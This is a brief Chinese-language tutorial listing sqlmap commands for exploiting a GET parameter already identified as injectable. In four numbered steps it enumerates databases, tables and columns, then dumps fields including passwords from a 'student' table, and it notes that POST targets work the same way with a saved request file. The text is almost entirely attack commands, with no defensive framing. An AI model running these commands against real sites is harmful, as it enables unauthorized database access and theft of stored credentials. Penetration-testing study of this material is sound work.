①当判断a为get注入点后(get)
可使用python sqlmap.py -u "url?a=1" --dbs爆数据库
假设结果中有member数据库
②爆表
python sqlmap.py -u "url?a=1" --tables -D member
假设有表student
③爆列
python sqlmap.py -u "url?a=1" --column -T student -D member
假设有列id,password,stasus等列
④爆字段
python sqlmap.py --u "url?a=1" --dump -C "id,password,status" -T student -D member
如果是post型的
语法类似,url改成文件,-u改成-r
